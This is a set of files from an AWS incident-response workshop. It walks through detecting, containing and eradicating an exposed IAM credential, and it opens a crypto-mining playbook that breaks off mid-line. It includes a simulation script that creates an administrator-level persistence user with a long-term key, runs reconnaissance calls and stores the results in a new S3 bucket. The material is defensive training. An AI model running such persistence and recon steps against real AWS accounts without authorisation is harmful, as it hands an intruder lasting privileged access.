{"user":{"path":"/","userName":"JaneDoe","userId":"AIDACKCEVSQ6C2EXAMPLE","arn":"arn:aws:iam::777777777777:user/JaneDoe","createDate":"Jul 24, 2021 2:22:32 AM"}} | | 263 | 2021-07-24T02:22:34Z | us-east-1 | CreateAccessKey | {"userName":"JaneDoe"} | {"accessKey":{"userName":"JaneDoe","accessKeyId":"AKIAI44QH8DHBEXAMPLE","status":"Active","createDate":"Jul 24, 2021 2:22:34 AM"}} | | 264 | 2021-07-24T02:22:33Z | us-east-1 | AttachUserPolicy | {"userName":"JaneDoe","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"} | null | | 265 | 266 | 267 | * The IAM User ```JaneDoe``` was created with the AWS managed policy ```AdministratorAccess``` attached and Access Key ID ```AKIAI44QH8DHBEXAMPLE```. 
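Before pivoting to the rogue user's activity, the CloudTrail record can be corroborated against the live IAM state. A minimal sketch using the read-only analyst profile (the user name and key ID come from the query results above):

```
# confirm the rogue user still exists and enumerate what is attached to it
aws iam get-user --user-name JaneDoe --profile SecurityAnalystRole
aws iam list-attached-user-policies --user-name JaneDoe --profile SecurityAnalystRole
aws iam list-access-keys --user-name JaneDoe --profile SecurityAnalystRole
```

With the rogue user confirmed, the next queries pivot to the activity performed with its credentials.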
268 | 269 | ``` 270 | -- retrieve API call activity of rogue user 271 | SELECT awsregion, eventsource, eventname, readonly, errorcode, errormessage, count(eventid) as COUNT 272 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 273 | WHERE useridentity.username = 'JaneDoe' 274 | AND date_partition >= '2021/07/16' 275 | AND date_partition <= '2021/07/24' 276 | GROUP BY awsregion, eventsource, eventname, readonly, errorcode, errormessage 277 | ORDER BY COUNT DESC 278 | ``` 279 | 280 | awsregion | eventsource | eventname | readonly | errorcode | errormessage | COUNT 281 | -----------|--------------------------------|-------------------------|------------|-------------|----------------|------- 282 | us-east-1 | sts.amazonaws.com | GetCallerIdentity | true | | | 2 283 | us-east-1 | iam.amazonaws.com | ListRoles | true | | | 1 284 | us-east-1 | logs.amazonaws.com | DescribeDestinations | true | | | 1 285 | us-east-1 | s3.amazonaws.com | CreateBucket | false | | | 1 286 | us-east-1 | kms.amazonaws.com | ListKeys | true | | | 1 287 | us-east-1 | lambda.amazonaws.com | ListFunctions20150331 | true | | | 1 288 | us-east-1 | s3.amazonaws.com | ListBuckets | true | | | 1 289 | us-east-1 | secretsmanager.amazonaws.com | ListSecrets | true | | | 1 290 | us-east-1 | kms.amazonaws.com | ListAliases | true | | | 1 291 | us-east-1 | s3.amazonaws.com | PutObject | false | | | 1 292 | us-east-1 | ec2.amazonaws.com | DescribeInstances | true | | | 1 293 | 294 | ``` 295 | -- retrieve rogue user source IP addresses and user agents used for API calls 296 | SELECT sourceipaddress, useragent, count(eventid) as COUNT 297 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 298 | WHERE useridentity.username = 'JaneDoe' 299 | AND date_partition >= '2021/07/16' 300 | AND date_partition <= '2021/07/24' 301 | GROUP BY sourceipaddress, useragent 302 | ORDER BY COUNT DESC 303 | ``` 304 | 305 | sourceipaddress | useragent | COUNT 306 | -----------------|------------------------------------------------------------------------------------------------------|------- 307 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/sts.get-caller-identity | 2 308 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/lambda.list-functions | 1 309 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/ec2.describe-instances | 1 310 | 198.51.100.77 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.put-object] | 1 311 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/secretsmanager.list-secrets | 1 312 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/iam.list-roles | 1 313 | 198.51.100.77 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.create-bucket] | 1 314 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/kms.list-aliases | 1 315 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/logs.describe-destinations | 1 316 | 72.21.198.71 | [aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/s3api.list-buckets] | 1 317 | 198.51.100.77 | aws-cli/2.2.1 Python/3.8.8 Darwin/20.5.0 exe/x86_64 prompt/off command/kms.list-keys | 1 318 | 319 | * No new source IP addresses surfaced 320 | * We need to analyze the changes made with the CreateBucket, and PutObject API calls. 
321 | * We need to analyze the probing made with the ListRoles, DescribeDestinations, ListKeys, ListFunctions20150331, ListBuckets, ListSecrets, ListAliases, and DescribeInstances API calls. 322 | 323 | ``` 324 | -- retrieve additional information about the rogue user changes 325 | SELECT eventtime, awsregion, eventname, requestparameters, responseelements, errorcode, errormessage 326 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 327 | WHERE useridentity.username = 'JaneDoe' 328 | AND date_partition >= '2021/07/16' 329 | AND date_partition <= '2021/07/24' 330 | AND eventname IN ('CreateBucket', 'PutObject') 331 | ``` 332 | 333 | eventtime | awsregion | eventname | requestparameters | responseelements | errorcode | errormessage 334 | ----------------------|-------------|----------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------|-------------|-------------- 335 | 2021-07-24T02:22:56Z | us-east-1 | CreateBucket | {"bucketName":"DOC-EXAMPLE-BUCKET","Host":"DOC-EXAMPLE-BUCKET.s3.us-east-1.amazonaws.com"} | null | | 336 | 2021-07-24T02:22:57Z | us-east-1 | PutObject | {"bucketName":"DOC-EXAMPLE-BUCKET","Host":"DOC-EXAMPLE-BUCKET.s3.us-east-1.amazonaws.com","key":"stuff"} | null | | 337 | 338 | * S3 Bucket name ```DOC-EXAMPLE-BUCKET``` was created and an object with key ```stuff``` was placed in it. 339 | 340 | ``` 341 | -- retrieve additional information about the rogue user probing 342 | SELECT eventtime, awsregion, requestparameters, responseelements, errorcode, errormessage 343 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail" 344 | WHERE useridentity.username = 'JaneDoe' 345 | AND date_partition >= '2021/07/16' 346 | AND date_partition <= '2021/07/24' 347 | AND eventname IN ('ListRoles', 'DescribeDestinations', 'ListKeys', 'ListFunctions20150331', 'ListBuckets', 'ListSecrets', 'ListAliases', 'DescribeInstances') 348 | ``` 349 | 350 | eventtime | awsregion | requestparameters | responseelements | errorcode | errormessage 351 | ----------------------|-------------|-----------------------------------------|--------------------|-------------|-------------- 352 | 2021-07-24T02:22:45Z | us-east-1 | null | null | | 353 | 2021-07-24T02:22:48Z | us-east-1 | null | null | | 354 | 2021-07-24T02:22:51Z | us-east-1 | {"Host":"s3.us-east-1.amazonaws.com"} | null | | 355 | 2021-07-24T02:22:52Z | us-east-1 | {"instancesSet":{},"filterSet":{}} | null | | 356 | 2021-07-24T02:22:53Z | us-east-1 | null | null | | 357 | 2021-07-24T02:22:46Z | us-east-1 | null | null | | 358 | 2021-07-24T02:22:49Z | us-east-1 | null | null | | 359 | 2021-07-24T02:22:50Z | us-east-1 | null | null | | 360 | 361 | * CloudTrail does not hold the information about the probed resources. 
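CloudTrail records the request parameters of these ```List*``` and ```Describe*``` calls but not the data they returned, so one way to approximate what the actor enumerated is to replay the same read-only calls with the analyst profile and snapshot the output for the case file; keep in mind the account state may have drifted since the probing occurred. A sketch (the output file name is arbitrary):

```
# replay the actor's read-only enumeration to approximate what was exposed
aws iam list-roles --profile SecurityAnalystRole > probed_inventory.txt
aws s3api list-buckets --profile SecurityAnalystRole >> probed_inventory.txt
aws ec2 describe-instances --profile SecurityAnalystRole >> probed_inventory.txt
aws secretsmanager list-secrets --profile SecurityAnalystRole >> probed_inventory.txt
```

In this case the object the actor uploaded to the S3 Bucket, retrieved next, shows exactly what was captured.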
362 | 363 | * Attempt to retrieve the object from the S3 Bucket using AWS CLI: 364 | ``` 365 | aws s3api get-object --bucket DOC-EXAMPLE-BUCKET --key stuff stuff --profile SecurityAnalystRole 366 | 367 | { 368 | "AcceptRanges": "bytes", 369 | "LastModified": "2021-07-24T02:22:58+00:00", 370 | "ContentLength": 43860, 371 | "ETag": "\"3551a9d2-22cd-481e-92ee-639334e18c43\"", 372 | "ContentType": "binary/octet-stream", 373 | "Metadata": {} 374 | } 375 | ``` 376 | 377 | * The contents of the retrieved file (preserved at ```../evidence/stuff```) are the outputs of the actor's probing API calls. 378 | 379 | * Attempt to retrieve the S3 Bucket policy using AWS CLI: 380 | ``` 381 | aws s3api get-bucket-policy --bucket DOC-EXAMPLE-BUCKET --profile SecurityAnalystRole 382 | 383 | An error occurred (NoSuchBucketPolicy) when calling the GetBucketPolicy operation: The bucket policy does not exist 384 | 385 | ``` 386 | 387 | * Attempt to retrieve the S3 Bucket ACL using AWS CLI: 388 | ``` 389 | aws s3api get-bucket-acl --bucket DOC-EXAMPLE-BUCKET --profile SecurityAnalystRole 390 | 391 | { 392 | "Owner": { 393 | "DisplayName": "maymajor", 394 | "ID": "e810532a-fef5-4ebd-b8f4-2ca52fea3b46" 395 | }, 396 | "Grants": [ 397 | { 398 | "Grantee": { 399 | "DisplayName": "maymajor", 400 | "ID": "e810532a-fef5-4ebd-b8f4-2ca52fea3b46", 401 | "Type": "CanonicalUser" 402 | }, 403 | "Permission": "FULL_CONTROL" 404 | } 405 | ] 406 | } 407 | 408 | ``` 409 | 410 | * * * 411 | 412 | ### Part 3: Analysis - Impact 413 | 414 | Parse through the distilled information looking for patterns, and extrapolate behaviors that contrast with the expected baseline of approved activity. Take a holistic approach: look at the data presented to you and continuously ask yourself whether the constructed patterns represent normal behavior, an external actor, or an insider. The following questions serve as a guide, but don't limit yourself; expand based on your own findings and doubts. Make sure to have *data* backing up your answers: 415 | 416 | 1. What related alerts have been triggered? 417 | * No related alerts have been triggered 418 | 2. What is the classification of the data accessed? 419 | * The service resource configurations probed by the actor are classified as "Internal" 420 | 3. What AWS services are not in the approved use list? 421 | * All services accessed by the actor are allowed to be used by authorized users 422 | 4. What AWS service configurations have been changed? 423 | * S3 Bucket ```DOC-EXAMPLE-BUCKET``` was created and an object with key ```stuff``` was placed in it. 424 | * The IAM User ```JaneDoe``` was created with the AWS managed policy ```AdministratorAccess``` attached and Access Key ID ```AKIAI44QH8DHBEXAMPLE```. 425 | 5. What guardrails have been disabled or modified? 426 | * None 427 | 6. Was the actor an insider or outsider? 428 | * An internal investigation has started; at the moment there is no evidence of insider activity 429 | 7. What evidence supports benign and malicious activity? 430 | * API calls logged in CloudTrail 431 | * Object (text file) uploaded by the actor to the S3 Bucket contains probing information 432 | 8. What is the impact to business applications and processes? 433 | * Escalated to the owner of the exposed credential; the credential was for a test in the development environment and production has not been affected 434 | 9. Is there any indication of possible data exfiltration? 
435 | * Yes; the actor collected probing information about the resources in the development account ```777777777777``` 436 | 437 | * * * 438 | 439 | ### Part 4: Containment 440 | 441 | The exposed credential belongs to the user ```JorgeSouza```, the initial compromise vector. The actor used it to create another user, ```JaneDoe```, which in turn created the S3 bucket ```DOC-EXAMPLE-BUCKET```. 442 | 443 | #### Resource list for account ```777777777777```: 444 | * S3 Bucket: ```DOC-EXAMPLE-BUCKET``` 445 | * IAM User: ```JorgeSouza``` and IAM Access Key ID: ```AKIAIOSFODNN7EXAMPLE``` 446 | * IAM User: ```JaneDoe``` and IAM Access Key ID: ```AKIAI44QH8DHBEXAMPLE``` 447 | 448 | #### Containment actions: 449 | 450 | * Disable IAM Access Key IDs ```AKIAIOSFODNN7EXAMPLE``` and ```AKIAI44QH8DHBEXAMPLE``` and verify: 451 | 452 | Please note IAM is [eventually consistent](https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency); if during verification the ```"Status"``` still shows ```"Active"```, run ```list-access-keys``` again and the ```"Status"``` will eventually show up as ```"Inactive"```. 453 | 454 | ``` 455 | aws iam update-access-key --access-key-id AKIAIOSFODNN7EXAMPLE --status Inactive --user-name JorgeSouza --profile SecurityBreakGlassRole 456 | (no output) 457 | 458 | 459 | aws iam list-access-keys --user-name JorgeSouza --profile SecurityBreakGlassRole 460 | { 461 | "AccessKeyMetadata": [ 462 | { 463 | "UserName": "JorgeSouza", 464 | "AccessKeyId": "AKIAIOSFODNN7EXAMPLE", 465 | "Status": "Inactive", 466 | "CreateDate": "2021-07-24T02:31:19+00:00" 467 | } 468 | ] 469 | } 470 | 471 | 472 | aws iam update-access-key --access-key-id AKIAI44QH8DHBEXAMPLE --status Inactive --user-name JaneDoe --profile SecurityBreakGlassRole 473 | (no output) 474 | 475 | aws iam list-access-keys --user-name JaneDoe --profile SecurityBreakGlassRole 476 | { 477 | "AccessKeyMetadata": [ 478 | { 479 | "UserName": "JaneDoe", 480 | "AccessKeyId": "AKIAI44QH8DHBEXAMPLE", 481 | "Status": "Inactive", 482 | "CreateDate": "2021-07-24T02:22:34+00:00" 483 | } 484 | ] 485 | } 486 | 487 | ``` 488 | 489 | * Attach the following policy to IAM Users ```JaneDoe``` and ```JorgeSouza``` and verify: 490 | 491 | ``` 492 | { 493 | "Version": "2012-10-17", 494 | "Statement": [ 495 | { 496 | "Sid": "IamPolicyForContainment", 497 | "Action": "*", 498 | "Effect": "Deny", 499 | "Resource": "*" 500 | } 501 | ] 502 | } 503 | ``` 504 | 505 | ``` 506 | aws iam create-policy --policy-name iam-containment-policy --policy-document file://containment/iam_containment_policy.json --profile SecurityBreakGlassRole 507 | { 508 | "Policy": { 509 | "PolicyName": "iam-containment-policy", 510 | "PolicyId": "ANPAJ2UCCR6DPCEXAMPLE", 511 | "Arn": "arn:aws:iam::777777777777:policy/iam-containment-policy", 512 | "Path": "/", 513 | "DefaultVersionId": "v1", 514 | "AttachmentCount": 0, 515 | "PermissionsBoundaryUsageCount": 0, 516 | "IsAttachable": true, 517 | "CreateDate": "2021-07-26T00:37:18+00:00", 518 | "UpdateDate": "2021-07-26T00:37:18+00:00" 519 | } 520 | } 521 | aws iam attach-user-policy --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --user-name JorgeSouza --profile SecurityBreakGlassRole 522 | (no output) 523 | 524 | aws iam list-attached-user-policies --user-name JorgeSouza --profile SecurityBreakGlassRole 525 | { 526 | "AttachedPolicies": [ 527 | { 528 | "PolicyName": "iam-containment-policy", 529 | "PolicyArn": "arn:aws:iam::777777777777:policy/iam-containment-policy" 530 | }, 531 | { 532 | "PolicyName": "SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL", 533 | "PolicyArn": "arn:aws:iam::777777777777:policy/SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL" 534 | } 535 | ] 536 | } 537 | 538 | 539 | aws iam attach-user-policy --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --user-name JaneDoe --profile SecurityBreakGlassRole 540 | (no output) 541 | 542 | aws iam list-attached-user-policies --user-name JaneDoe --profile SecurityBreakGlassRole 543 | { 544 | "AttachedPolicies": [ 545 | { 546 | "PolicyName": "AdministratorAccess", 547 | "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess" 548 | }, 549 | { 550 | "PolicyName": "iam-containment-policy", 551 | "PolicyArn": "arn:aws:iam::777777777777:policy/iam-containment-policy" 552 | } 553 | ] 554 | } 555 | 556 | ``` 557 | 558 | * Apply a containment policy to S3 Bucket ```DOC-EXAMPLE-BUCKET``` that denies all access except for the ```SecurityBreakGlassRole```, allowing forensics without requiring the root user: 559 | 560 | ``` 561 | { 562 | "Version": "2012-10-17", 563 | "Statement": [ 564 | { 565 | "Condition": { 566 | "StringNotLike": { 567 | "aws:PrincipalArn": [ 568 | "arn:aws:iam::777777777777:role/SecurityBreakGlassRole" 569 | ] 570 | } 571 | }, 572 | "Action": "*", 573 | "Resource": [ 574 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 575 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 576 | ], 577 | "Effect": "Deny", 578 | "Principal": "*", 579 | "Sid": "BucketPolicyForContainment" 580 | } 581 | ] 582 | } 583 | ``` 584 | 585 | ``` 586 | aws s3api put-bucket-policy --bucket DOC-EXAMPLE-BUCKET --policy file://containment/s3_bucket_containment_policy.json --profile SecurityBreakGlassRole 587 | (no output) 588 | 589 | aws s3api get-bucket-policy --bucket DOC-EXAMPLE-BUCKET --profile SecurityBreakGlassRole | jq '[.[]|fromjson]' 590 | [ 591 | { 592 | "Version": "2012-10-17", 593 | "Statement": [ 594 | { 595 | "Sid": "BucketPolicyForContainment", 596 | "Effect": "Deny", 597 | "Principal": "*", 598 | "Action": "*", 599 | "Resource": [ 600 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 601 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 602 | ], 603 | "Condition": { 604 | "StringNotLike": { 605 | "aws:PrincipalArn": "arn:aws:iam::777777777777:role/SecurityBreakGlassRole" 606 | } 607 | } 608 | } 609 | ] 610 | } 611 | ] 612 | 613 | 614 | ``` 615 | 616 | * * * 617 | 618 | ### Part 5: Eradication 619 | 620 | #### Resource list for account ```777777777777```: 621 | * S3 Bucket: ```DOC-EXAMPLE-BUCKET``` 622 | * IAM User: ```JorgeSouza``` and IAM Access Key ID: ```AKIAIOSFODNN7EXAMPLE``` 623 | * IAM User: ```JaneDoe``` and IAM Access Key ID: ```AKIAI44QH8DHBEXAMPLE``` 624 | 625 | ***>>>>>THESE ACTIONS ARE FINAL AND UNRECOVERABLE<<<<<*** 626 | 627 | * Delete S3 Bucket 628 | * After preserving the objects in the S3 Bucket, force delete it: 629 | ``` 630 | aws s3 rb s3://DOC-EXAMPLE-BUCKET --force --profile SecurityBreakGlassRole 631 | delete: s3://DOC-EXAMPLE-BUCKET/stuff 632 | remove_bucket: DOC-EXAMPLE-BUCKET 633 | 634 | ``` 635 | 636 | * Delete IAM Users 637 | 638 | Please note IAM is [eventually consistent](https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency); if during verification the users still appear to exist, they will eventually be deleted. 
639 | 640 | ``` 641 | aws iam detach-user-policy --user-name JorgeSouza --policy-arn arn:aws:iam::777777777777:policy/SimulationStack-SystemJorgeSouzaPolicy6FA12ED7-1I709F3HY50FL --profile SecurityBreakGlassRole 642 | (no output) 643 | aws iam detach-user-policy --user-name JorgeSouza --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --profile SecurityBreakGlassRole 644 | (no output) 645 | aws iam delete-access-key --user-name JorgeSouza --access-key-id AKIAIOSFODNN7EXAMPLE --profile SecurityBreakGlassRole 646 | (no output) 647 | aws iam delete-user --user-name JorgeSouza --profile SecurityBreakGlassRole 648 | (no output) 649 | aws iam get-user --user-name JorgeSouza --profile SecurityBreakGlassRole 650 | 651 | An error occurred (NoSuchEntity) when calling the GetUser operation: The user with name JorgeSouza cannot be found. 652 | 653 | 654 | 655 | 656 | aws iam detach-user-policy --user-name JaneDoe --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile SecurityBreakGlassRole 657 | (no output) 658 | aws iam detach-user-policy --user-name JaneDoe --policy-arn arn:aws:iam::777777777777:policy/iam-containment-policy --profile SecurityBreakGlassRole 659 | (no output) 660 | aws iam delete-access-key --user-name JaneDoe --access-key-id AKIAI44QH8DHBEXAMPLE --profile SecurityBreakGlassRole 661 | (no output) 662 | aws iam delete-user --user-name JaneDoe --profile SecurityBreakGlassRole 663 | (no output) 664 | aws iam get-user --user-name JaneDoe --profile SecurityBreakGlassRole 665 | 666 | An error occurred (NoSuchEntity) when calling the GetUser operation: The user with name JaneDoe cannot be found. 667 | 668 | ``` 669 | 670 | * * * 671 | 672 | ### Part 6: Recovery 673 | 674 | * No recovery steps required 675 | 676 | * * * 677 | 678 | ### Part 7: Post-Incident Activity 679 | 680 | **Recommendations:** 681 | * Automate containment and eradication with AWS CLI or SDK 682 | * Save all Athena queries used in the playbook for faster use 683 | * Pursue eliminating use of long term IAM User Access Keys and adopt short term STS tokens 684 | * Create alerts based on creation of long term IAM User Access Keys 685 | 686 | 687 | -------------------------------------------------------------------------------- /playbooks/credential_exposure/containment/iam_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Sid": "IamPolicyForContainment", 6 | "Action": "*", 7 | "Effect": "Deny", 8 | "Resource": "*" 9 | } 10 | ] 11 | } -------------------------------------------------------------------------------- /playbooks/credential_exposure/containment/s3_bucket_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Condition": { 6 | "StringNotLike": { 7 | "aws:PrincipalArn": [ 8 | "arn:aws:iam::777777777777:role/SecurityBreakGlassRole" 9 | ] 10 | } 11 | }, 12 | "Action": "*", 13 | "Resource": [ 14 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET", 15 | "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*" 16 | ], 17 | "Effect": "Deny", 18 | "Principal": "*", 19 | "Sid": "BucketPolicyForContainment" 20 | } 21 | ] 22 | } -------------------------------------------------------------------------------- /playbooks/credential_exposure/evidence/stuff: -------------------------------------------------------------------------------- 1 | # REDACTED 
-------------------------------------------------------------------------------- /playbooks/credential_exposure/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/credential_exposure/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/credential_exposure/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/credential_exposure/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/credential_exposure/simulation/simulate_credential_exposure_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, jq, AWS Region 6 | # example: ```./simulate_credential_exposure_activity.sh credential_exposure us-east-1``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # 9 | # activity generated: 10 | # - creates an IAM User with administrative entitlements 11 | # - creates long term IAM Access Key for new IAM User 12 | # - performs light recon activity with `list` and `describe` commands using the newly created IAM Access Key 13 | # - creates S3 Bucket and saves light recon output to it 14 | # 15 | PROFILE=${1} 16 | REGION=${2} 17 | PERSISTENCE_USER=$(echo "helpdesk-"$(uuidgen) | awk '{print tolower($0)}') 18 | echo "checking credential account ownership" 19 | aws sts get-caller-identity --profile ${PROFILE} &> /dev/null 20 | echo "creating persistence IAM User" 21 | aws iam create-user --user-name ${PERSISTENCE_USER} --profile ${PROFILE} &> /dev/null 22 | echo "making persistence user administrator" 23 | aws iam attach-user-policy --user-name ${PERSISTENCE_USER} --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --profile ${PROFILE} &> /dev/null 24 | echo "creating IAM Access Key for user" 25 | aws iam create-access-key --user-name ${PERSISTENCE_USER} --profile ${PROFILE} > ak.json 26 | # saves current AWS env 27 | echo "preserving existing AWS ENV" 28 | AWS_ID=${AWS_ACCESS_KEY_ID} 29 | AWS_SK=${AWS_SECRET_ACCESS_KEY} 30 | AWS_DR=${AWS_DEFAULT_REGION} 31 | AWS_ST=${AWS_SESSION_TOKEN} 32 | export AWS_ACCESS_KEY_ID=$(jq -r '.AccessKey.AccessKeyId' ak.json) 33 | export AWS_SECRET_ACCESS_KEY=$(jq -r '.AccessKey.SecretAccessKey' ak.json) 34 | export AWS_DEFAULT_REGION=${REGION} 35 | unset AWS_SESSION_TOKEN 36 | echo "deleting IAM Access Key ID and Secret from disk" 37 | rm -f ak.json 38 | error=1 39 | # https://docs.aws.amazon.com/IAM/latest/UserGuide/troubleshoot_general.html#troubleshoot_general_eventual-consistency 40 | while [ ${error} -ne 0 ] 41 | do 42 | echo "waiting for ${PERSISTENCE_USER} IAM Access Keys to be available" 43 | aws sts get-caller-identity &> /dev/null 44 | error=${?} 45 | sleep 1 46 | done 47 | # light recon 48 | echo "performing light recon" 49 | aws sts get-caller-identity > recon.txt 50 | aws iam list-roles >> recon.txt 51 | aws lambda list-functions >> recon.txt 52 | aws kms list-keys >> recon.txt 53 | aws kms list-aliases >> recon.txt 54 | aws logs describe-destinations >> 
recon.txt 55 | aws s3api list-buckets >> recon.txt 56 | aws ec2 describe-instances >> recon.txt 57 | aws secretsmanager list-secrets >> recon.txt 58 | aws sqs list-queues >> recon.txt 59 | BUCKET_NAME=$(echo "simulation-"$(uuidgen) | awk '{print tolower($0)}') 60 | # save recon output for posterity 61 | aws s3api create-bucket --bucket ${BUCKET_NAME} &> /dev/null 62 | aws s3api put-object --bucket ${BUCKET_NAME} --key stuff --body recon.txt &> /dev/null 63 | rm -f recon.txt 64 | # restore the original AWS ENV 65 | echo "restoring AWS ENV" 66 | export AWS_SESSION_TOKEN=${AWS_ST} 67 | export AWS_ACCESS_KEY_ID=${AWS_ID} 68 | export AWS_SECRET_ACCESS_KEY=${AWS_SK} 69 | export AWS_DEFAULT_REGION=${AWS_DR} 70 | echo "${BUCKET_NAME}" > bucket.resources 71 | echo "${PERSISTENCE_USER}" > user.resources 72 | echo "resources created to be deleted after playbook is completed" 73 | echo "S3 Bucket $(cat bucket.resources)" 74 | echo "IAM User $(cat user.resources)" 75 | echo "save the files bucket.resources and user.resources for future use by the bash script undo_simulate_credential_exposure_activity.sh" 76 | echo "end of ${0}" 77 | 78 | -------------------------------------------------------------------------------- /playbooks/credential_exposure/simulation/undo_simulate_credential_exposure_activity.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # usage: ```./undo_simulate_credential_exposure_activity.sh``` 6 | # requirement: use AWS CloudShell with AssumeRole SecurityBreakGlass 7 | # use case: deletes resources created by simulation using files `bucket.resources` and `user.resources` as input 8 | # 9 | PERSISTENCE_USER=$(cat user.resources) 10 | BUCKET_NAME=$(cat bucket.resources) 11 | echo "trying to delete IAM User ${PERSISTENCE_USER}" 12 | user_policy_arn=$(aws iam list-attached-user-policies --user-name ${PERSISTENCE_USER} | jq -r '.AttachedPolicies[].PolicyArn') 13 | aws iam detach-user-policy --user-name ${PERSISTENCE_USER} --policy-arn ${user_policy_arn} &> /dev/null 14 | access_key_id=$(aws iam list-access-keys --user-name ${PERSISTENCE_USER} | jq -r '.AccessKeyMetadata[].AccessKeyId') 15 | aws iam delete-access-key --user-name ${PERSISTENCE_USER} --access-key-id ${access_key_id} &> /dev/null 16 | aws iam delete-user --user-name ${PERSISTENCE_USER} &> /dev/null 17 | error=${?} 18 | if [ ${error} -ne 0 ] 19 | then 20 | echo "delete for IAM User ${PERSISTENCE_USER} returned error code ${error}" 21 | else 22 | echo "deletion succeeded for IAM User ${PERSISTENCE_USER}" 23 | fi 24 | echo "trying to delete S3 Bucket ${BUCKET_NAME}" 25 | aws s3 rb s3://${BUCKET_NAME} --force &> /dev/null 26 | error=${?} 27 | if [ ${error} -ne 0 ] 28 | then 29 | echo "delete for S3 Bucket ${BUCKET_NAME} returned error code ${error}" 30 | else 31 | echo "deletion succeeded for S3 Bucket ${BUCKET_NAME}" 32 | fi 33 | echo "end of ${0}" 34 | 35 | -------------------------------------------------------------------------------- /playbooks/crypto_mining/containment/iam_containment_policy.json: -------------------------------------------------------------------------------- 1 | { 2 | "Version": "2012-10-17", 3 | "Statement": [ 4 | { 5 | "Sid": "IamPolicyForContainment", 6 | "Action": "*", 7 | "Effect": "Deny", 8 | "Resource": "*" 9 | } 10 | ] 11 | } -------------------------------------------------------------------------------- 
/playbooks/crypto_mining/images/aws_caf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/crypto_mining/images/aws_caf.png -------------------------------------------------------------------------------- /playbooks/crypto_mining/images/nist_life_cycle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/aws-samples/aws-incident-response-playbooks-workshop/c996d4cf0117132beea928e537274caa73a8d4e6/playbooks/crypto_mining/images/nist_life_cycle.png -------------------------------------------------------------------------------- /playbooks/crypto_mining/response_scripts/retrieve_guardduty_findings.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 3 | # SPDX-License-Identifier: MIT-0 4 | # 5 | # requirements: AWS CLI profile, AWS Region, jq, GuardDuty finding type 6 | # example: ```./retrieve_guardduty_findings.sh security_analyst us-east-1 '"CryptoCurrency:EC2/BitcoinTool.B!DNS"'``` 7 | # jq download https://stedolan.github.io/jq/download/ 8 | # GuardDuty finding types https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html 9 | PROFILE=${1} 10 | REGION=${2} 11 | FINDING_TYPE=${3} 12 | detector_id=$(aws guardduty list-detectors --region ${REGION} --profile ${PROFILE} | jq -r '.DetectorIds[]') 13 | echo "detector ID ${detector_id}" 14 | finding_ids=$(aws guardduty list-findings --detector-id ${detector_id} --finding-criteria '{"Criterion": {"type": {"Eq": 